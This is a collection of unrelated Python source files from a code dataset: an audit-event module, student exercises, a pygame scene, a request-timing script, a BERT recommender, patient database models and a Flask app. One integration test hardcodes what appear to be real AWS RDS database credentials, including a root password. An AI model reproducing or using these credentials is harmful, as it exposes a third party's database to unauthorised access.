self.instanceUserInfo.id,\n self.siteInfo.name, self.siteInfo.id)\n return retval\n\n @property\n def xhtml(self):\n cssClass = u'audit-event profile-event-%s' % self.code\n retval = u'Set password' % cssClass\n if self.instanceUserInfo.id != self.userInfo.id:\n retval = u'%s — %s' %\\\n (retval, userInfo_to_anchor(self.userInfo))\n retval = u'%s (%s)' % \\\n (retval, munge_date(self.context, self.date))\n return retval\n\nclass ChangeProfileEvent(BasicAuditEvent):\n implements(IAuditEvent)\n\n def __init__(self, context, id, d, userInfo, instanceUserInfo,\n siteInfo, instanceDatum, supplementaryDatum):\n\n BasicAuditEvent.__init__(self, context, id,\n CHANGE_PROFILE, d, userInfo, instanceUserInfo,\n siteInfo, None, instanceDatum, supplementaryDatum,\n SUBSYSTEM)\n\n def __str__(self):\n old, new = self.get_old_new()\n fieldName = self.get_fieldname()\n retval = u'%s (%s) changed profile attribute %s (%s) of '\\\n u'%s (%s) from %s to %s on %s (%s)' %\\\n (self.userInfo.name, self.userInfo.id,\n fieldName, self.instanceDatum,\n self.instanceUserInfo.name, self.instanceUserInfo.id,\n old, new, self.siteInfo.name, self.siteInfo.id)\n return retval\n\n def get_old_new(self):\n retval = [b64decode(d).decode('utf-8')\n for d in self.supplementaryDatum.split(',')]\n assert len(retval) == 2\n return retval\n\n def get_fieldname(self):\n field = self.instanceDatum\n interface = profile_interface(self.context)\n fieldName = interface.get(field, '')\n fieldName = fieldName and fieldName.title\n return fieldName\n\n @property\n def xhtml(self):\n cssClass = u'audit-event profile-event-%s' % self.code\n old, new = self.get_old_new()\n retval = u'Profile-field '\\\n u'%s '\\\n u'changed to '\\\n u'%s (was '\\\n u'%s)' % \\\n (cssClass, self.instanceDatum, self.get_fieldname(),\n xml_escape(new), xml_escape(old))\n if self.instanceUserInfo.id != self.userInfo.id:\n retval = u'%s — %s' %\\\n (retval, userInfo_to_anchor(self.userInfo))\n retval = u'%s (%s)' % \\\n (retval, munge_date(self.context, self.date))\n return retval\n\nclass RegisterEvent(BasicAuditEvent):\n \"\"\"Registration Event. 
The \"instanceDatum\" is the address used\n to create the new user.\n \"\"\"\n implements(IAuditEvent)\n\n def __init__(self, context, id, d, userInfo, instanceUserInfo,\n siteInfo, instanceDatum, supplementaryDatum):\n\n BasicAuditEvent.__init__(self, context, id,\n REGISTER, d, userInfo, instanceUserInfo,\n siteInfo, None, instanceDatum, supplementaryDatum,\n SUBSYSTEM)\n\n def __str__(self):\n retval = u'Registering a new user with address <%s>' %\\\n self.instanceDatum\n return retval\n\n @property\n def xhtml(self):\n cssClass = u'audit-event profile-event-%s' % self.code\n retval = u'Signed up, with address '\\\n u'%s' %\\\n (cssClass, self.instanceDatum)\n if ((self.instanceUserInfo.id != self.userInfo.id)\n and not(self.userInfo.anonymous)):\n retval = u'%s — %s' %\\\n (retval, userInfo_to_anchor(self.userInfo))\n retval = u'%s (%s)' % \\\n (retval, munge_date(self.context, self.date))\n return retval\n\nclass CreateUserEvent(BasicAuditEvent):\n \"\"\"Administrator Creating a User Event.\n\n The \"instanceDatum\" is the address used to create the new user.\n \"\"\"\n implements(IAuditEvent)\n\n def __init__(self, context, id, d, userInfo, instanceUserInfo,\n siteInfo, instanceDatum, supplementaryDatum):\n\n BasicAuditEvent.__init__(self, context, id,\n REGISTER, d, userInfo, instanceUserInfo,\n siteInfo, None, instanceDatum, supplementaryDatum,\n SUBSYSTEM)\n\n def __str__(self):\n retval = u'Administrator %s (%s) creating a new user with '\\\n u'address <%s>' %\\\n (self.userInfo.name, self.userInfo.id, self.instanceDatum)\n return retval\n\n @property\n def xhtml(self):\n cssClass = u'audit-event profile-event-%s' % self.code\n retval = u'Created a user, with address '\\\n u'%s' %\\\n (cssClass, self.instanceDatum)\n if ((self.instanceUserInfo.id != self.userInfo.id)\n and not(self.userInfo.anonymous)):\n retval = u'%s — %s' %\\\n (retval, userInfo_to_anchor(self.userInfo))\n retval = u'%s (%s)' % \\\n (retval, munge_date(self.context, self.date))\n return retval\n\n\nclass ProfileAuditer(object):\n def __init__(self, user):\n self.user = user\n self.userInfo = createObject('groupserver.LoggedInUser',user)\n self.instanceUserInfo = IGSUserInfo(user)\n self.siteInfo = createObject('groupserver.SiteInfo', user)\n\n self.queries = AuditQuery()\n\n self.factory = ProfileAuditEventFactory()\n\n def info(self, code, instanceDatum = '', supplementaryDatum = ''):\n d = datetime.now(UTC)\n eventId = event_id_from_data(self.userInfo,\n self.instanceUserInfo, self.siteInfo, code, instanceDatum,\n supplementaryDatum)\n\n e = self.factory(self.user, eventId, code, d,\n self.userInfo, self.instanceUserInfo, self.siteInfo, None,\n instanceDatum, supplementaryDatum, SUBSYSTEM)\n\n self.queries.store(e)\n log.info(e)\n\n","repo_name":"groupserver/Products.GSProfile","sub_path":"Products/GSProfile/profileaudit.py","file_name":"profileaudit.py","file_ext":"py","file_size_in_byte":8533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9904104730","text":"# a program to count the number of votes\n# Xola GcwaBE\n# 26/04/2014\n# BLSXOL001\n\nprint(\"Independent Electoral Commission\")\nprint(\"--------------------------------\")\nprint(\"Enter the names of parties (terminated by DONE):\")\nparty=\" \" # initializing party\nvotes =[] # initializing votes - empty list\nwhile party!=\"DONE\": # setting sentinel = 'DONE'\n party=input() # get party the user votes for\n votes.append(party) # adding each party voted for into votes\nx = 
votes.index(\"DONE\") # finding the index of the sentinel\ndel votes[x] # deleting sentinel from list\nprint()\nprint(\"Vote counts:\")\nvpp = [] # intialize votes per party (vpp)\nfor vote in votes: \n if vote in vpp: # check if vote is in votes per party\n vote = 0 \n else:\n vpp.append(vote) # if not, add it tio the list: vvp\nvpp.sort() \nfor i in vpp: # sorting the vpp list alphabetically\n print(\"%-10s - %s\" % (i, votes.count(i))) \n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_6/blsxol001/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34517047895","text":"import sys\n\nimport pkg_resources\n# from db_compare_1_0_0.db_compare_plugin import DbComparePlugin\nprint(sys.path)\nfrom db_compare_1_0_0.db_compare_plugin import DbComparePlugin\n\n\n\ndef create_plugin() -> DbComparePlugin:\n for entry_point in pkg_resources.iter_entry_points('db_compare_1_0_0.plugin'):\n return entry_point.load()()\n\n\ndef test_ref_plugin():\n p = create_plugin()\n print(p.home)\n\n\ndef test_plugin_run():\n p = create_plugin()\n p.run(databases=[\n {\"operate\": \"DumpIn\", \"database_info\": {\n \"host\": \"dev-03-instance-1.c9qe4y0vrvda.rds.cn-northwest-1.amazonaws.com.cn\",\n \"user\": \"root\",\n \"pwd\": \"8YTJWOuA7XRK17wRQnw4\",\n \"port\": 3306,\n \"database\": \"eclinical_edc_dev_863\"}, \"sql_file\": p.prepare_procedure},\n {\"operate\": \"DumpIn\", \"database_info\": {\n \"host\": \"dev-03-instance-1.c9qe4y0vrvda.rds.cn-northwest-1.amazonaws.com.cn\",\n \"user\": \"root\",\n \"port\": 3306,\n \"pwd\": \"8YTJWOuA7XRK17wRQnw4\",\n \"database\": \"eclinical_edc_dev_864\"}, \"sql_file\": p.prepare_procedure\n }])\n print(p.plugin_run_result)\n","repo_name":"thcpc/warden","sub_path":"plugins/db_compare/db_compare_1_0_0/integration_tests/test_db_compare_1_0_0.py","file_name":"test_db_compare_1_0_0.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74307231161","text":"from .Scene import Scene\nfrom .Button import NormalButton\nfrom .Constants import Constants\nfrom .Game import Game\nfrom .TextManager import BlinkableText\nimport pygame\n\nclass GameOverScene(Scene):\n \n def __init__(self, width, height, background_image_url):\n super().__init__(width, height, background_image_url)\n self.play_again_text = BlinkableText(Constants.PLAY_AGAIN_TEXT_POSITION, Constants.PLAY_AGAIN_TEXT_COLOR, Constants.PLAY_AGAIN_TEXT_SIZE, Constants.PLAY_AGAIN_TEXT_NAME, Constants.PLAY_AGAIN_TEXT)\n self.play_again_text.show = True\n self.background_image = background_image_url\n\n def init(self, player:str, game:Game):\n winner = game.getWinner()\n \n winner = 1 if game.player1_score == Constants.MAX_SCORE else 2\n if winner == int(player):\n print('you won')\n self.background_image = pygame.transform.scale(pygame.image.load(Constants.WIN_BACKGROUND_IMAGE).convert_alpha(), (Constants.SCREEN_WIDTH, Constants.SCREEN_HEIGHT))\n else:\n print('you lost')\n self.background_image = pygame.transform.scale(pygame.image.load(Constants.LOSE_BACKGROUND_IMAGE).convert_alpha(), (Constants.SCREEN_WIDTH, Constants.SCREEN_HEIGHT))\n\n def draw(self):\n self.surface.blit(self.background_image, (0, 0))\n self.play_again_text.render(self.surface)\n\n def update(self, **kwargs):\n player = int(kwargs.get('player'))\n game = kwargs.get('game')\n 
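        # (added note) `player` and `game` arrive through **kwargs from the
        # caller; they are read here but not used further in this method,
        # which only refreshes the blinking text and the display below.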
self.play_again_text.update()\n pygame.display.update()","repo_name":"jaeymax/rps","sub_path":"classes/GameOverScene.py","file_name":"GameOverScene.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24795129653","text":"from collections import defaultdict\n\nN = int(input())\nMOD = 10**9+7\n\nnglist = [\n \"?AGC\", \"AGC?\",\n \"A?GC\", \"AG?C\",\n \"GAC?\", \"?GAC\",\n \"ACG?\", \"?ACG\"\n]\nng = {}\nfor t in \"AGCT\":\n for n in nglist:\n ng[n.replace('?', t)] = 1\n\ndp = {\"TTT\": 1}\n\nfor i in range(N):\n ans = 0\n _dp = defaultdict(int)\n for k, v in dp.items():\n for t in \"AGCT\":\n s = k+t\n if s not in ng:\n _dp[s[1:]] += v\n ans = (ans+v) % MOD\n dp = _dp\n if i == (N-1):\n print(ans)\n","repo_name":"whisper0077/programming-contests","sub_path":"atcoder/ABC/122/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15930253638","text":"# Time: 2022/5/13 0013 15:39\r\n# import os\r\n# os.rename('templates/index.txt','templates/index.py')\r\n# import os, sys, subprocess, tempfile, time\r\n# EXEC = sys.executable\r\n#\r\n\r\n# from django.shortcuts import render, HttpResponse, redirect\r\n# f = open(\"templates/index.py\",\"r\")\r\n# data = f.read()\r\n# f.close()\r\n# print(data)\r\n#\r\n# def selenium(data):\r\n# data\r\n#\r\n# print\r\n\r\n\r\n# outdata = subprocess.check_output([EXEC, data], stderr=subprocess.STDOUT, timeout=5)\r\n# print('outdata:'+ outdata)\r\n\r\n# stderr=subprocess.STDOUT,\r\n# from demo1.flaskrun import index\r\n# index()\r\n\r\n# import openpyxl\r\n# from openpyxl import Workbook,load_workbook\r\n# from openpyxl.styles import *\r\n# import warnings\r\n# import re\r\n# import speedtest\r\n\r\n\r\n# 创建\r\n# with open('templates/url_test.txt', mode='r', encoding='utf-8') as f:\r\n# url = f.readlines()\r\n# # print(url)\r\n# print('------------------------------------')\r\n# pattern = r'(http(.*?)://(.+))'\r\n# # match = re.search(pattern, url)\r\n# # print(match.group())\r\n# print('------------------------------------')\r\n# for i in url:\r\n# match = re.search(pattern, i)\r\n# if match:\r\n# print(match.group())\r\n# os.remove('templates/url_test.txt')\r\n\r\n# # 测网速\r\n# network_speed_test = speedtest.Speedtest()\r\n# # 下载速度\r\n# download_speed = network_speed_test.download()\r\n# if download_speed > 1024 * 1024:\r\n# download_speed = round(network_speed_test.download() / 1024 / 1024, 3)\r\n# print(\"下载速度:\" + str(download_speed) + \" Mb/s\")\r\n# elif download_speed > 1024:\r\n# download_speed = round(network_speed_test.download() / 1024, 3)\r\n# print(\"下载速度:\" + str(download_speed) + \" Kb/s\")\r\n# else:\r\n# download_speed = round(download_speed, 3)\r\n# print(\"下载速度:\" + str(download_speed) + \" b/s\")\r\n#\r\n# # 上传速度\r\n# upload_speed = network_speed_test.upload()\r\n# if upload_speed > 1024 * 1024:\r\n# upload_speed = round(network_speed_test.upload() / 1024 / 1024, 3)\r\n# print(\"上传速度:\" + str(upload_speed) + \" Mb/s\")\r\n# elif upload_speed > 1024:\r\n# upload_speed = round(network_speed_test.upload() / 1024, 3)\r\n# print(\"上传速度:\" + str(upload_speed) + \" Kb/s\")\r\n# else:\r\n# upload_speed = round(upload_speed, 3)\r\n# print(\"上传速度:\" + str(upload_speed) + \" b/s\")\r\n\r\n# _thread.start_new_thread ( function, args[, kwargs] )\r\n# import _thread\r\n# import time\r\n#\r\n# # 为线程定义一个函数\r\n# def print_time( 
threadName, delay):\r\n# count = 0\r\n# while count < 5:\r\n# time.sleep(delay)\r\n# count += 1\r\n# print (\"%s: %s\" % ( threadName, time.ctime(time.time()) ))\r\n#\r\n# # 创建两个线程\r\n# try:\r\n# _thread.start_new_thread( print_time, (\"线程1\", 2, ) )\r\n# _thread.start_new_thread( print_time, (\"线程2\", 4, ) )\r\n# print('ok')\r\n# except:\r\n# print (\"Error: 无法启动线程\")\r\n#\r\n# while 1:\r\n# pass\r\n\r\n\r\n\r\nimport threading\r\nimport time\r\nimport requests\r\n\r\n\r\n# 成功\r\nsuccess = 0\r\n# 失败\r\nfail = 0\r\n# 开始时间\r\n\r\n\r\n\r\nclass myThread (threading.Thread):\r\n def __init__(self, name):\r\n threading.Thread.__init__(self)\r\n self.name = name\r\n\r\n def run(self):\r\n # 开始线程\r\n test()\r\n\r\n\r\n\r\n\r\ndef test():\r\n global success\r\n global fail\r\n resp = requests.get('http://127.0.0.1:8000/test')\r\n if resp.status_code == 200:\r\n success += 1\r\n else:\r\n fail += 1\r\n\r\n\r\n#线程数量\r\nthread_amout = 100\r\n\r\nprint('开始线程')\r\nprint('线程数量:',thread_amout)\r\n# 创建新线程列表\r\nthread_list = []\r\nfor i in range(thread_amout):\r\n thread_list.append(myThread(\"Thread\"))\r\n# 启动线程\r\nstart_time = time.time()\r\nfor thread in thread_list:\r\n thread.start()\r\n thread.join()\r\nend_time = time.time()\r\n\r\n# 成功率\r\nsuccess_rate = round(((success / thread_amout) * 100), 3)\r\n\r\n\r\n\r\nprint('线程结束')\r\nprint('success:', success)\r\nprint('fail:', fail)\r\nprint('成功率:' + str(success_rate) + '%')\r\nprint('开始时间:', start_time)\r\nprint('结束时间:', end_time)\r\nprint('总耗时:', str((end_time - start_time) * 1000), 'ms')\r\n\r\n\r\n","repo_name":"hahahayu/frontendProjects","sub_path":"web-automated-test-platform/demo1/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4097,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"23205861517","text":"import sys\nimport collections\n\ninput = sys.stdin.readline\n\nn, m = map(int, input().rstrip().split(' '))\nbasket = [list(map(int, input().rstrip().split(' '))) for _ in range(n)]\ncases = collections.deque([list(map(int, input().rstrip().split(' '))) for _ in range(m)])\ncloud = [[n, 1], [n, 2], [n - 1, 1], [n - 1, 2]]\nincrease_water_location = []\nDIAGONAL = [[-1, -1], [1, 1], [-1, 1], [1, -1]]\n\ndef is_diagonal(x, y):\n if x == -1 or y == -1:\n return False\n if x == n or y == n:\n return False\n return True\n\n\ndef move(direction):\n if direction == 1:\n for c in cloud:\n c[1] -= 1\n\n if c[1] == 0:\n c[1] = n\n\n elif direction == 2:\n for c in cloud:\n c[0] -= 1\n c[1] -= 1\n\n if c[0] == 0:\n c[0] = n\n if c[1] == 0:\n c[1] = n\n elif direction == 3:\n for c in cloud:\n c[0] -= 1\n if c[0] == 0:\n c[0] = n\n\n elif direction == 4:\n for c in cloud:\n c[0] -= 1\n c[1] += 1\n\n if c[0] == 0:\n c[0] = n\n if c[1] == n + 1:\n c[1] = 1\n elif direction == 5:\n for c in cloud:\n c[1] += 1\n if c[1] == n + 1:\n c[1] = 1\n\n elif direction == 6:\n for c in cloud:\n c[0] += 1\n c[1] += 1\n\n if c[0] == n + 1:\n c[0] = 1\n if c[1] == n + 1:\n c[1] = 1\n elif direction == 7:\n for c in cloud:\n c[0] += 1\n if c[0] == n + 1:\n c[0] = 1\n else:\n for c in cloud:\n c[0] += 1\n c[1] -= 1\n\n if c[0] == n + 1:\n c[0] = 1\n if c[1] == 0:\n c[1] = n\n\n\nwhile cases:\n direction, distance = cases.popleft()\n destroy_cloud_location = [[0 for _ in range(n)] for _ in range(n)]\n\n for _ in range(distance):\n move(direction)\n for c in cloud:\n x, y = c\n basket[x - 1][y - 1] += 1\n destroy_cloud_location[x - 1][y - 1] = 1\n increase_water_location.append([x - 1, y - 1])\n\n 
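    # (added note) Water-copy step: each cloud cell gains +1 water for every
    # one of its four diagonal neighbours that already holds water.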
for location in cloud:\n x, y = location\n for delta in DIAGONAL:\n next_x = x - 1 + delta[0]\n next_y = y - 1 + delta[1]\n if is_diagonal(next_x, next_y) and basket[next_x][next_y] > 0:\n basket[x - 1][y - 1] += 1\n cloud = []\n for i in range(n):\n for j in range(n):\n\n if basket[i][j] >= 2 and destroy_cloud_location[i][j] == 0:\n cloud.append([i + 1, j + 1])\n basket[i][j] -= 2\nresult = 0\n\nfor b in basket:\n result += sum(b)\nprint(result)\n","repo_name":"alsdk3586/study-algorithm","sub_path":"12월/20211226/박다정/p_2.py","file_name":"p_2.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"27965058000","text":"import numpy as np\nimport ast\nfrom transformers import AutoTokenizer, AutoModel\nimport torch\nfrom scipy.spatial.distance import cosine\nimport nltk\nfrom nltk.corpus import stopwords\nfrom string import punctuation\nimport re\n\nclass recomendacion:\n def __init__(self):\n print(\"Inicializando motor de busqueda\")\n self.dic_tratado = {}\n with open('dic_tratado.txt', 'r') as f:\n contenido = f.read()\n # Convierte el contenido en un diccionario utilizando ast.literal_eval()\n self.dic_tratado = ast.literal_eval(contenido)\n self.generos={}\n with open('generos.txt', 'r') as f:\n contenido = f.read()\n # Convierte el contenido en un diccionario utilizando ast.literal_eval()\n self.generos = ast.literal_eval(contenido)\n self.emb_dic={}\n with open('embenddings.txt', 'r') as archivo:\n for linea in archivo:\n # Eliminar los espacios en blanco al principio y al final de la línea\n linea = linea.strip()\n # Separar la línea en el ID y el vector\n id, vector = linea.split(':')\n # Eliminar los espacios en blanco al principio y al final del ID y convertirlo a entero\n id = str(id.strip())\n # Convertir la cadena que representa al vector a una lista de números\n vector = [float(num) for num in vector.strip()[1:-1].split(',')]\n # Guardar el ID y el vector en el diccionario\n self.emb_dic[id] = vector\n self.dic={}\n with open('diccionario.txt', 'r') as f:\n contenido = f.read()\n # Convierte el contenido en un diccionario utilizando ast.literal_eval()\n self.dic = ast.literal_eval(contenido)\n # Cargar modelo pre-entrenado y tokenizador\n self.tokenizer = AutoTokenizer.from_pretrained('bert-base-uncased')\n self.model = AutoModel.from_pretrained('bert-base-uncased')\n # Enunciado a representar\n def calcular_similitud(self, enunciado):\n #Tokenizar enunciado y convertir a tensores\n inputs = self.tokenizer(enunciado, return_tensors='pt')\n tokens_tensor = inputs['input_ids']\n segments_tensor = inputs['token_type_ids']\n with torch.no_grad():\n outputs = self.model(tokens_tensor, segments_tensor)\n embeddings = outputs[0][:, 0, :]\n embeddings_list = [round(num.item(), 2) for num in embeddings[0]]\n # Asignar lista redondeada como valor del diccionario\n embending_enunciado = embeddings_list\n similitudes = {}\n #Calcular similitud\n #No borrar mas alla de este comentario!!!!!!!!!!1\n for key in self.emb_dic:\n similitud = np.dot(embending_enunciado, self.emb_dic[key]) / (np.linalg.norm(embending_enunciado) * np.linalg.norm(self.emb_dic[key]))\n similitud_re= round(similitud.item(), 2)\n similitudes[key]=similitud_re\n sim_ordenado = dict(sorted(similitudes.items(), key=lambda x: x[1], reverse=True))\n return sim_ordenado\n def recomendados(self,sim):\n recomendaciones = []\n i=0\n for key in sim:\n if i<10:\n recomendaciones.append(key)\n else:\n break\n i=i+1\n return 
recomendaciones\n def comparar_enunciados(self, enunciado):\n # Crear embedding del nuevo enunciado\n tokenizer = AutoTokenizer.from_pretrained('bert-base-uncased')\n model = AutoModel.from_pretrained('bert-base-uncased')\n inputs = tokenizer(enunciado, return_tensors='pt')\n tokens_tensor = inputs['input_ids']\n segments_tensor = inputs['token_type_ids']\n with torch.no_grad():\n outputs = model(tokens_tensor, segments_tensor)\n nuevo_emb = outputs[0][:, 0, :][0].numpy()\n # Comparar con embeddings existentes\n similitudes = {}\n maximo=0\n for key in self.emb_dic:\n i=0\n for palabra in enunciado.split():\n if palabra in self.dic_tratado[key]:\n i=i+1\n if i>maximo:\n maximo=i\n for key in self.emb_dic:\n similitud = 1 - cosine(nuevo_emb, self.emb_dic[key])\n i=0\n for palabra in enunciado.split():\n if palabra in self.dic_tratado[key]:\n i=i+1\n if i>0:\n similitudes[key] = (similitud/2)+(i/(2*maximo))\n else:\n similitudes[key] = similitud/2\n sim_ordenado = dict(sorted(similitudes.items(), key=lambda x: x[1], reverse=True))\n return sim_ordenado\n def procesar_enunciado(self, enunciado):\n # Tokenización\n tokens = nltk.word_tokenize(enunciado)\n\n # Eliminación de stopwords y puntuación\n stopwords_english = stopwords.words('english')\n punctuations = list(punctuation)\n clean_tokens = [token.lower() for token in tokens if token.lower() not in stopwords_english and token not in punctuations]\n\n # Eliminación de números\n clean_tokens = [re.sub('\\d', '', token) for token in clean_tokens]\n\n # Unión de tokens limpios en un solo string\n clean_enunciado = ' '.join(clean_tokens)\n return clean_enunciado\n def main(self):\n print(\"Calculando...\")\n #id=self.calcular_similitud()\n enunciado=\"children movies like toy story\"\n clean_enun=self.procesar_enunciado(enunciado)\n similitudes = self.comparar_enunciados(clean_enun)\n recomendaciones=self.recomendados(similitudes)\n #print(similitudes)\n\nrun=recomendacion()\nrun.main()\n","repo_name":"Edgar-Padilla/Peliculas-Tkinter","sub_path":"sysR.py","file_name":"sysR.py","file_ext":"py","file_size_in_byte":5698,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35525663551","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('users', '0016_auto_20160105_1801'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='DarkLaunch',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('feature_tag', models.CharField(unique=True, max_length=50)),\n ('description', models.TextField()),\n ('created_at', models.DateTimeField(auto_now_add=True)),\n ('companies', models.ManyToManyField(related_name='company_features', null=True, to='users.Company', blank=True)),\n ('created_by', models.ForeignKey(related_name='user_created_features', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name': 'Dark Launch Code',\n 'verbose_name_plural': 'Dark Launch Codes',\n },\n ),\n ]\n","repo_name":"pranaykhilari-tudip/wan-project","sub_path":"wantoo-mars/users/migrations/0017_darklaunch.py","file_name":"0017_darklaunch.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} 
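The next sample decrypts a file with a repeating-key XOR. As a quick, self-contained sanity check of the idea (the bytes and key below are hypothetical toy values, not taken from the sample), XOR-ing with the same key twice restores the original data:

data = bytearray(b"attack at dawn")
key = bytearray(b"k3y")
once = bytearray(b ^ key[i % len(key)] for i, b in enumerate(data))
twice = bytearray(o ^ key[i % len(key)] for i, o in enumerate(once))
assert twice == data  # XOR with the same repeating key is its own inverse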
+{"seq_id":"25154605184","text":"#!/usr/bin/python\ndef xor(input, key):\n l = len(key)\n j = len(input)\n return bytearray((\n (input[i] ^ key[i % l]) for i in range(0, j)\n ))\n\ninput = bytearray(open(\"encrypted.xor\", \"rb\").read())\nkey = bytearray(open(\"keyfile\",\"rb\").read())\noutput = xor(input, key)\nopen(\"decrypted.txt\", \"wb\").write(output)\n","repo_name":"spark1991z/routerboard","sub_path":"tools/xor_decrypt.py","file_name":"xor_decrypt.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"40"} +{"seq_id":"35801052212","text":"from datetime import datetime\n\nfrom . import db\n\n\nclass Patient(db.Model):\n __tablename__ = \"patient\"\n id = db.Column(db.Integer, primary_key=True)\n firstname = db.Column(db.String(45), nullable=False)\n lastname = db.Column(db.String(45), nullable=False)\n birtday = db.Column(db.String(10), nullable=False)\n sex = db.Column(db.String(10), nullable=False)\n name_father = db.Column(\n db.String(45), nullable=False, default=\"No informado\")\n name_mather = db.Column(\n db.String(45), nullable=False, default=\"No informado\")\n reference_telephone = db.Column(\n db.String(14), nullable=False, default=\"No informado\"\n )\n reference_contact = db.Column(\n db.String(45), nullable=False, default=\"No informado\")\n document = db.Column(db.String(45), unique=True, nullable=False)\n email = db.Column(db.String(45), nullable=True)\n marital_status = db.Column(\n db.String(45), nullable=False, default=\"Soltero\")\n profession = db.Column(db.String(45), nullable=False,\n default=\"No informado\")\n controlled_medicine = db.Column(\n db.String(255), nullable=False, default=\"No informado\"\n )\n blood_type = db.Column(db.String(45), nullable=False,\n default=\"No informado\")\n smoker = db.Column(db.Boolean, default=False)\n consumes_alcohol = db.Column(db.Boolean, default=False)\n drug_user = db.Column(db.Boolean, default=False)\n chronic_disease = db.Column(\n db.String(255), nullable=False, default=\"No informado\")\n allergies = db.Column(db.String(255), nullable=False,\n default=\"No informado\")\n phone = db.relationship(\n \"PatientPhone\",\n back_populates=\"patient\",\n uselist=False,\n lazy=\"joined\",\n cascade=\"all, delete-orphan\",\n )\n address = db.relationship(\n \"PatientAddress\",\n back_populates=\"patient\",\n uselist=False,\n lazy=\"joined\",\n cascade=\"all, delete-orphan\",\n )\n medical_records = db.relationship(\n \"MedicalRecords\",\n backref=\"patient\",\n lazy=\"joined\",\n cascade=\"all, delete-orphan\",\n )\n clinical_care = db.relationship(\n \"ClinicCare\",\n back_populates=\"patient\",\n lazy=\"joined\",\n cascade=\"all, delete-orphan\",\n )\n created_at = db.Column(\n db.DateTime, default=datetime.now, server_default=db.func.now()\n )\n updated_at = db.Column(\n db.DateTime, onupdate=datetime.now, server_default=db.func.now()\n )\n\n @property\n def age(self):\n if self.birtday:\n birth_date = datetime.strptime(self.birtday, \"%Y-%m-%d\")\n today = datetime.now()\n age = (\n today.year\n - birth_date.year\n - ((today.month, today.day) < (birth_date.month, birth_date.day))\n )\n return age\n return None\n\n @property\n def format_patient_reference_phone(self):\n return f\"({self.reference_telephone[:3]}) {self.reference_telephone[3:7]}-{self.reference_telephone[7:]}\"\n\n @property\n def formatted_created_at(self):\n return (\n self.created_at.strftime(\n \"%d/%m/%Y %H:%M:%S\") if self.created_at else None\n )\n\n @property\n def 
formatted_updated_at(self):\n return (\n self.updated_at.strftime(\n \"%d/%m/%Y %H:%M:%S\") if self.updated_at else None\n )\n\n def __str__(self):\n return self.firstname\n\n\nclass PatientPhone(db.Model):\n __tablename__ = \"patient_phone\"\n id = db.Column(db.Integer, primary_key=True)\n phone = db.Column(db.String(14), default=\"000\")\n patient_id = db.Column(db.ForeignKey(\"patient.id\"), nullable=False)\n patient = db.relationship(\"Patient\", back_populates=\"phone\")\n\n def __str__(self):\n return self.phone\n\n @property\n def format_patient_phone(self):\n return f\"({self.phone[:3]}) {self.phone[3:7]}-{self.phone[7:]}\"\n\n\nclass PatientAddress(db.Model):\n __tablename__ = \"patient_address\"\n id = db.Column(db.Integer, primary_key=True)\n address = db.Column(db.String(255), nullable=False)\n number = db.Column(db.String(10), nullable=False)\n complement = db.Column(db.String(45), nullable=False, default=\"Não\")\n neighborhood = db.Column(db.String(45), nullable=False)\n city = db.Column(db.String(45), nullable=False)\n state = db.Column(db.String(45), nullable=False)\n patient_id = db.Column(db.ForeignKey(\"patient.id\"), nullable=False)\n patient = db.relationship(\"Patient\", back_populates=\"address\")\n\n def __str__(self):\n return self.address\n","repo_name":"IgorStrauss/control-clinic","sub_path":"control_clinic/models/patients.py","file_name":"patients.py","file_ext":"py","file_size_in_byte":4669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29013695325","text":"from flask import Flask, Markup, render_template, request\nfrom processing import confirm, display_result, person_id_for_name\n\napp = Flask(__name__, static_url_path='/static')\napp.config[\"DEBUG\"] = True\n\n@app.route('/degrees', methods=[\"GET\", \"POST\"])\ndef adder_page():\n confirmation = \"\"\n errors = \"\"\n\n if request.method == \"POST\":\n\n source = None\n target = None\n\n if request.form[\"action\"] == \"Find degrees\":\n actor1 = str(request.form[\"actor-one\"])\n actor2 = str(request.form[\"actor-two\"])\n try:\n source = person_id_for_name(actor1)\n target = person_id_for_name(actor2)\n\n if source is None:\n confirmation = \"\"\n errors += \"{!r} was not found.\".format(request.form[\"actor-one\"])\n elif target is None:\n confirmation = \"\"\n errors += \"{!r} was not found.\".format(request.form[\"actor-two\"])\n elif ((len(source) > 20) and (source != None) and (target != None)):\n confirmation = Markup(source)\n source = None\n if (len(target) > 15):\n confirmation2 = Markup(target)\n source = None\n return render_template('confirmations.html',\n confirmation1=confirmation, confirmation2=confirmation2,\n errors=errors, number=\"3\", actor1=actor1, actor2=actor2,\n confirmed1=\"confirmed-id1\", confirmed2=\"confirmed-id2\")\n else:\n return render_template('confirmation.html',\n confirmation=confirmation, errors=errors, number=\"1\",\n actor1=actor1, actor2=actor2, 